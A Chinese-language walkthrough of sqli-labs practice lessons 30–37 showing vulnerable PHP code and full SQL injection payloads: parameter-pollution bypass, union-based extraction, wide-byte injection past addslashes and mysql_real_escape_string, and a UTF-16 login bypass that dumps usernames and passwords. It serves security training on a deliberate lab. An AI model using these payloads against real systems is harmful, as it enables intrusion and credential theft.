WEB常见漏洞之SQL注入(靶场篇—2)4

本文涉及的产品
RDS MySQL DuckDB 分析主实例,集群系列 4核8GB
RDS MySQL DuckDB 分析主实例,基础系列 4核8GB
RDS DuckDB + QuickBI 企业套餐,8核32GB + QuickBI 专业版
简介: WEB常见漏洞之SQL注入(靶场篇—2)4

Lesson-30

该题为双引号get型注入,利用方式包括联合查询注入、布尔盲注、时间盲注


id=1

一旦输入错误会重定向hacked.jsp


目标SQL语句如下:

//index.php
$id=$_GET['id']
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
# 返回内容
if true:
    输出查询内容;
else:
    输出存在错误;
//login.php
$qs = $_SERVER['QUERY_STRING'];
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
# 返回内容
if true:
    输出查询内容;
else:
    输出存在错误;
function whitelist($input)
{
  $match = preg_match("/^\d+$/", $input);
  if($match)
  {
    //echo "you are good";
    //return $match;
  }
  else
  {  
    header('Location: hacked.php');
    //echo "you are bad";
  }
}
function java_implimentation($query_string)
{
  $q_s = $query_string;
  $qs_array= explode("&",$q_s);
  foreach($qs_array as $key => $value)
  {
    $val=substr($value,0,2);
    if($val=="id")
    {
      $id_value=substr($value,3,30); 
      return $id_value;
      echo "<br>";
      break;
    }
  }
}

注意:该题的利用方式与lesson29类似,只不过拼接方式由单引号转换为双引号,同时不再输出详细的MySQL报错信息,因此无法使用报错注入进行攻击

使用联合查询判断注入点,尝试验证


id=1&id=1" and "1"="1 //返回正常界面


id=1&id=1" and "1"="2 //返回错误界面

判断字段数


id=1&id=1" order by 3--+ //返回正确界面


id=1&id=1" order by 4--+ //返回报错界面

由此可说明字段数为3,通过 union select 查看回显位置


id=1&id=-1" union select 1,2,3--+


查询基础信息

id=1&id=-1" union select 1,user(),3--+
id=1&id=-1" union select 1,version(),3--+
id=1&id=-1" union select 1,database(),3--+


640.png

查询表名


id=1&id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

查询列名


id=1&id=-1" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+


查询关键信息


id=1&id=-1" union select 1,group_concat(username),group_concat(password) from users--+

Lesson-31

该题为单括号双引号get型注入,利用方式包括联合查询注入、布尔盲注、时间盲注


id=1

一旦输入错误会重定向hacked.jsp

目标SQL语句如下:

//index.php
$id=$_GET['id']
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE (id=$id) LIMIT 0,1";
# 返回内容
if true:
    输出查询内容;
else:
    print_r(mysql_error());
//login.php
$qs = $_SERVER['QUERY_STRING'];
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
# 返回内容
if true:
    输出查询内容;
else:
    print_r(mysql_error());
function whitelist($input)
{
  $match = preg_match("/^\d+$/", $input);
  if($match)
  {
    //echo "you are good";
    //return $match;
  }
  else
  {  
    header('Location: hacked.php');
    //echo "you are bad";
  }
}
function java_implimentation($query_string)
{
  $q_s = $query_string;
  $qs_array= explode("&",$q_s);
  foreach($qs_array as $key => $value)
  {
    $val=substr($value,0,2);
    if($val=="id")
    {
      $id_value=substr($value,3,30); 
      return $id_value;
      echo "<br>";
      break;
    }
  }
}

注意:该题的利用方式与lesson30类似,只不过拼接方式由双引号转换为单括号双引号

使用联合查询判断注入点,尝试验证


id=1&id=1") and ("1")=("1 //返回正常界面


id=1&id=1" and "1"="2 //返回错误界面

判断字段数


id=1&id=1") order by 3--+ //返回正确界面


id=1&id=1") order by 4--+ //返回报错界面

由此可说明字段数为3,通过 union select 查看回显位置


id=1&id=-1") union select 1,2,3--+


查询基础信息

id=1&id=-1") union select 1,user(),3--+
id=1&id=-1") union select 1,version(),3--+
id=1&id=-1") union select 1,database(),3--+

640.png

查询表名


id=1&id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+


查询列名


id=1&id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+


查询关键信息


id=1&id=-1") union select 1,group_concat(username),group_concat(password) from users--+


Lesson-32

该题为单引号get型注入,利用方式包括联合查询注入、报错注入、布尔盲注、时间盲注


id=1'

目标SQL语句如下:

$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
# 返回内容
if true:
    输出查询内容;
else:
    print_r(mysql_error());
function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);
    $string = preg_replace('/\'/i', '\\\'', $string);
    $string = preg_replace('/\"/', "\\\"", $string);
    return $string;
}

注意:该题采用了新的过滤规则,将常用的单双引号、反斜杠等敏感字符都进行了反斜杠转义,我们需要去除反斜杠,因此可使用宽字节注入进行绕过

如果程序的默认字符集为 GBK 等宽字节字符集时,就有可能产生宽字节注入。MySQL 在使用 GBK 编码时会认为两个字符是一个汉字,例如%aa%5c就会被 MySQL 认为是一个汉字。而\字符的 URL 编码为%5c'字符的 URL 编码为%27,当我们输入%df%27时由于目标对'字符进行了过滤,因此输出为%df%5c%27%df%5c被 MySQL 当做了汉字,而%27则被当做单独的符号使用。

需要注意的是只有前一个 ASCII 码大于128才能到达汉字范围,因此不只是%df,理论上来说%81-%FE均可用于宽字节注入。

由于旧版本的 MySQL 安装时,会有编码问题导致中文乱码。因此需要查看 MySQL 中的编码类型


SHOW VARIABLES LIKE 'character%';


使用联合查询判断注入点,尝试验证


id=1%df' //返回报错界面


id=1%df'--+ //返回正常界面

判断字段数


id=1%df' order by 3--+ //返回正确界面



id=1%df' order by 4--+ //返回报错界面

由此可说明字段数为3,通过 union select 查看回显位置


id=-1%df' union select 1,2,3--+

查询基础信息

id=-1%df' union select 1,user(),3--+
id=-1%df' union select 1,version(),3--+
id=-1%df' union select 1,database(),3--


640.png

查询表名,将原先的输出库名的'转换为database()函数,当然也可以转换为十进制输出


id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

查询列名


id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+

查询关键信息


id=-1%df' union select 1,group_concat(username),group_concat(password) from users--+

Lesson-33

该题为单引号get型注入,利用方式包括联合查询注入、报错注入、布尔盲注、时间盲注


id=1'

目标SQL语句如下:

$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
# 返回内容
if true:
    输出查询内容;
else:
    print_r(mysql_error());
function check_addslashes($string)
{
    $string= addslashes($string);    
    return $string;
}

注意:该题与Lesson32的利用方式相同,只不过更换了过滤函数addslashes(),该函数可在预定义字符之前添加反斜杠\的字符串

addslashes()函数预定义字符如下:

  • 单引号 '
  • 双引号 "
  • 反斜杠 \
  • 空字符 NULL

默认情况下 PHP 对所有GETPOSTCOOKIE请求数据执行addslashes()。所以不应对已转义过的字符串使用addslashes(),这样会导致二次转义。遇到这种情况我们可以使用函get_magic_quotes_gpc()进行检测。stripslashes()函数可删除由addslashes()函数添加的反斜杠。实际上它与Lesson32的过滤功能类似,都可以使用宽字节进行注入。

使用联合查询判断注入点,尝试验证


id=1%df' //返回报错界面


id=1%df'--+ //返回正常界面


判断字段数


id=1%df' order by 3--+ //返回正确界面


id=1%df' order by 4--+ //返回报错界面

由此可说明字段数为3,通过 union select 查看回显位置


id=-1%df' union select 1,2,3--+

查询基础信息

id=-1%df' union select 1,user(),3--+
id=-1%df' union select 1,version(),3--+
id=-1%df' union select 1,database(),3--+

640.png

查询表名,将原先的输出库名的'转换为database()函数,当然也可以转换为十进制输出


id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

查询列名


id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+

查询关键信息


id=-1%df' union select 1,group_concat(username),group_concat(password) from users--+

Lesson-34

该题为单引号post型注入,利用方式包括联合查询注入、报错注入、布尔盲注、时间盲注,登录界面以 post 方式接收变量

目标SQL语句如下:

$uname1=$_POST['uname'];
$passwd1=$_POST['passwd'];
$uname = addslashes($uname1);
$passwd= addslashes($passwd1);
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
# 返回内容
if true:
    输出查询内容;
else:
    print_r(mysql_error());

注意:该题与Lesson33的利用方式相同,只不过将请求方式由GET转换为POST,但POST中不能进行URLencode,可使用UTF-8UTF-16UTF-32,登录成功或失败会返回不同的图片

使用iconv命令进行 UTF 编码转换,从表面上看这是个乱码字符

echo \'|iconv -f utf-8 -t utf-16
echo \'|iconv -f utf-8 -t utf-32

640.png

截取登录请求包并复制以上乱码字符使用万能密码进行登录,成功登录


uname=admin�'%20or%201#&passwd=admin&submit=Submit

那为什么这个万能密码能够生效呢?我们尝试将其代入SQL语句当中


SELECT username, password FROM users WHERE username='admin�' or 1#' and password='admin' LIMIT 0,1;

需要注意的是这里的or 1or 1=1的简化写法,只要是永真条件均可,同样的还有or trueor 2>1

使用联合查询判断字段数


uname=admin�'%20order%20by%202#&passwd=admin&submit=Submit //返回正常界面


uname=admin�'%20order%20by%203#&passwd=admin&submit=Submit //返回报错界面

由此可说明字段数为2,通过 union select 查看回显位置


uname=admin�'%20union%20select%201,2#&passwd=admin&submit=Submit

查询基础信息

uname=admin�'%20union%20select%20user(),version()#&passwd=admin&submit=Submit
uname=admin�'%20union%20select%20database(),2#&passwd=admin&submit=Submit

640.png

查询表名,将原先的输出库名的'转换为database()函数,当然也可以转换为十进制输出


uname=admin�'%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()#&passwd=admin&submit=Submit

查询列名


uname=admin�'%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273#&passwd=admin&submit=Submit

查询关键信息


uname=admin�'%20union%20select%20group_concat(username),group_concat(password)%20from%20users#&passwd=admin&submit=Submit


Lesson-35

该题为数字型get型注入,利用方式包括联合查询注入、报错注入、布尔盲注、时间盲注


id=1'

目标SQL语句如下:

$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
# 返回内容
if true:
    输出查询内容;
else:
    print_r(mysql_error());
function check_addslashes($string)
{
    $string = addslashes($string);
    return $string;
}

注意:该题的过滤方式非常有意思,使用addslashes()函数过滤的是字符串,但在SQL语句中拼接的是字符,因此实际注入与平常的数字型注入无差别

使用联合查询判断注入点


id=1 and 1=1 //返回正确界面


id=1 and 1=2 //返回错误界面

判断字段数


id=1 order by 3# //返回正常界面


id=1 order by 4# //返回报错界面

由此可说明字段数为3,通过 union select 查看回显位置


id=-1 union select 1,2,3#

查询基础信息



id=-1 union select 1,user(),version()#id=-1 union select 1,database(),3#

查询表名,将原先的输出库名的'转换为database()函数,当然也可以转换为十进制输出


id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

查询列名


id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#

查询关键信息


id=-1 union select 1,group_concat(username),group_concat(password) from users#

Lesson-36

该题为单引号get型注入,利用方式包括联合查询注入、报错注入、布尔盲注、时间盲注


id=1'

目标SQL语句如下:


$id=check_quotes($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
# 返回内容
if true:
    输出查询内容;
else:
    print_r(mysql_error());
function check_quotes($string)
{
    $string= mysql_real_escape_string($string);    
    return $string;
}

注意:该题与Lesson33的利用方式相同,只不过更换了过滤函数mysql_real_escape_string(),该函数可在预定义字符之前添加反斜杠\的字符串

mysql_real_escape_string()函数预定义字符如下:

  • 单引号 '
  • 双引号 "
  • 反斜杠 \

mysql_real_escape_string()函数可转义 SQL 语句中使用的字符串中的特殊字符。与Lesson32的过滤功能类似,都可以使用宽字节进行注入。

使用联合查询判断注入点,尝试验证


id=1%df' //返回报错界面



id=1%df'--+ //返回正常界面

判断字段数


id=1%df' order by 3--+ //返回正确界面


id=1%df' order by 4--+ //返回报错界面

由此可说明字段数为3,通过 union select 查看回显位置


id=-1%df' union select 1,2,3--+

查询基础信息

id=-1%df' union select 1,user(),3--+
id=-1%df' union select 1,version(),3--+
id=-1%df' union select 1,database(),3--+


640.png

查询表名,将原先的输出库名的'转换为database()函数,当然也可以转换为十进制输出


id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+


查询列名


id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+

查询关键信息


id=-1%df' union select 1,group_concat(username),group_concat(password) from users--+

Lesson-37

该题为单引号post型注入,利用方式包括联合查询注入、报错注入、布尔盲注、时间盲注,登录界面以 post 方式接收变量

目标SQL语句如下:

$uname1=$_POST['uname'];
$passwd1=$_POST['passwd'];
$uname = mysql_real_escape_string($uname1);
$passwd= mysql_real_escape_string($passwd1);
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
# 返回内容
if true:
    输出查询内容;
else:
    print_r(mysql_error());

注意:该题与Lesson36的利用方式相同,只不过将请求方式由GET转换为POST,但POST中不能进行URLencode,可使用UTF-8UTF-16UTF-32,登录成功或失败会返回不同的图片

使用iconv命令进行 UTF 编码转换,从表面上看这是个乱码字符

echo \'|iconv -f utf-8 -t utf-16
echo \'|iconv -f utf-8 -t utf-32


640.png

截取登录请求包并复制以上乱码字符使用万能密码进行登录,成功登录

uname=admin�'%20or%201#&passwd=admin&submit=Submit


那为什么这个万能密码能够生效呢?我们尝试将其代入SQL语句当中



SELECT username, password FROM users WHERE username='admin�' or 1#' and password='admin' LIMIT 0,1;

需要注意的是这里的or 1or 1=1的简化写法,只要是永真条件均可,同样的还有or trueor 2>1

使用联合查询判断字段数


uname=admin�'%20order%20by%202#&passwd=admin&submit=Submit //返回正常界面



uname=admin�'%20order%20by%203#&passwd=admin&submit=Submit //返回报错界面

由此可说明字段数为2,通过 union select 查看回显位置


uname=admin�'%20union%20select%201,2#&passwd=admin&submit=Submit

查询基础信息

uname=admin�'%20union%20select%20user(),version()#&passwd=admin&submit=Submit
uname=admin�'%20union%20select%20database(),2#&passwd=admin&submit=Submit


640.png


查询表名,将原先的输出库名的'转换为database()函数,当然也可以转换为十进制输出


uname=admin�'%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()#&passwd=admin&submit=Submit

查询列名


uname=admin�'%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273#&passwd=admin&submit=Submit

查询关键信息


uname=admin�'%20union%20select%20group_concat(username),group_concat(password)%20from%20users#&passwd=admin&submit=Submit


0x02 总结

该靶场是学习 SQL 注入的好途径,刷完全部题目后面对 SQL 注入的了解有很大帮助,整个靶场以 MySQL + PHP 搭建环境为主,根据不同环境切换了 Windows、Linux 以及 Tomcat 代理。如果想要测试目标点是否存在 SQL 注入,我们应该从请求方式、注入点闭合方式、请求头部、后端SQL语句以及注入方式等方面进行考虑,确定了这些后再想方设法绕过站点中的 一些限制性因素情况等,其实这就是手工注入的魅力,当然会使用 sqlmap 也是一件好事,有了手工+自动两种方式的结合,在面对一般的 SQL 注入问题都可以迎刃而解。本文详细讲解了21-37关高级注入的通关教程。




相关实践学习
每个IT人都想学的“Web应用上云经典架构”实战
本实验从Web应用上云这个最基本的、最普遍的需求出发,帮助IT从业者们通过“阿里云Web应用上云解决方案”,了解一个企业级Web应用上云的常见架构,了解如何构建一个高可用、可扩展的企业级应用架构。
MySQL数据库入门学习
本课程通过最流行的开源数据库MySQL带你了解数据库的世界。 &nbsp; 相关的阿里云产品:云数据库RDS MySQL 版 阿里云关系型数据库RDS(Relational Database Service)是一种稳定可靠、可弹性伸缩的在线数据库服务,提供容灾、备份、恢复、迁移等方面的全套解决方案,彻底解决数据库运维的烦恼。 了解产品详情:&nbsp;https://www.aliyun.com/product/rds/mysql&nbsp;
目录
相关文章
|
9月前
|
安全 测试技术 程序员
web渗透-文件包含漏洞
文件包含漏洞源于程序动态包含文件时未严格校验用户输入,导致可加载恶意文件。分为本地和远程包含,常见于PHP,利用伪协议、日志或session文件可实现代码执行,需通过合理过滤和配置防范。
1383 79
web渗透-文件包含漏洞
|
9月前
|
存储 安全 前端开发
Web渗透-文件上传漏洞-上篇
文件上传漏洞常见于Web应用,因类型限制不严可致恶意文件执行。本文介绍前端检测、MIME类型、黑名单、.htaccess、空格、双写等多种绕过方式,并结合upload-labs靶场演示利用方法,提升安全防护认知。
2939 1
Web渗透-文件上传漏洞-上篇
|
9月前
|
安全 中间件 应用服务中间件
WEB渗透-文件上传漏洞-下篇
本文详解文件上传安全漏洞,涵盖白名单绕过(如00截断、条件竞争)、图片木马制作与利用、以及IIS、Apache、Nginx等常见解析漏洞原理与防御。结合实战案例,深入剖析攻击手法与修复方案。
748 1
|
9月前
|
存储 JavaScript 安全
Web渗透-XSS漏洞深入及xss-labs靶场实战
XSS(跨站脚本攻击)是常见的Web安全漏洞,通过在网页中注入恶意脚本,窃取用户信息或执行非法操作。本文介绍其原理、分类(反射型、存储型、DOM型)、测试方法及xss-labs靶场实战案例,帮助理解与防御XSS攻击。
2817 1
Web渗透-XSS漏洞深入及xss-labs靶场实战
|
9月前
|
安全 NoSQL Shell
web渗透-SSRF漏洞及discuz论坛网站测试
SSRF(服务器端请求伪造)是一种安全漏洞,攻击者可诱使服务端发起任意请求,进而探测或攻击内网系统。常用于端口扫描、访问内部服务、读取本地文件等。常见防御包括限制协议、域名和IP,但可通过302跳转、短地址等方式绕过。
495 1
web渗透-SSRF漏洞及discuz论坛网站测试
|
9月前
|
安全 程序员 数据库连接
web渗透-CSRF漏洞
CSRF(跨站请求伪造)是一种常见的Web安全漏洞,攻击者通过伪造用户请求,诱使其在已登录状态下执行非意愿操作。本文介绍CSRF原理、分类(站外与站内)、DVWA靶场搭建及防御措施,如同源策略与Token验证,提升安全防护意识。
698 0
web渗透-CSRF漏洞
|
9月前
|
安全 Linux PHP
Web渗透-命令执行漏洞-及常见靶场检测实战
命令执行漏洞(RCE)指应用程序调用系统命令时,用户可控制输入参数,导致恶意命令被拼接执行,从而危害系统安全。常见于PHP的system、exec等函数。攻击者可通过命令连接符在目标系统上执行任意命令,造成数据泄露或服务瘫痪。漏洞成因包括代码层过滤不严、第三方组件缺陷等。可通过参数过滤、最小权限运行等方式防御。本文还介绍了绕过方式、靶场测试及复现过程。
1914 0
|
9月前
|
安全 数据安全/隐私保护
Web渗透-逻辑漏洞
逻辑漏洞主要因程序逻辑不严谨或复杂导致处理错误,常见于越权访问、密码修改、支付等环节。漏洞统计显示,越权操作和逻辑漏洞占比最高,尤其账号安全风险突出,如任意重置密码、验证码暴力破解等。漏洞分类中,越权访问分为水平越权(同权限用户间数据访问)和垂直越权(跨权限数据访问)。
405 0
Web渗透-逻辑漏洞
|
9月前
|
存储 安全 Java
web渗透-反序列化漏洞
序列化是将对象转为可传输字符串的技术,便于存储与传输。PHP通过serialize/unserialize实现,Java通过Serializable接口和ObjectOutputStream完成。文中还介绍了反序列化漏洞在安全测试中的利用方法及CTF实战案例。
285 0
web渗透-反序列化漏洞
|
9月前
|
SQL Web App开发 安全
SQL Server 2025 年 9 月更新 - 修复 CVE-2025-47997 SQL Server 信息泄露漏洞
SQL Server 2025 年 9 月更新 - 修复 CVE-2025-47997 SQL Server 信息泄露漏洞
613 0
SQL Server 2025 年 9 月更新 - 修复 CVE-2025-47997 SQL Server 信息泄露漏洞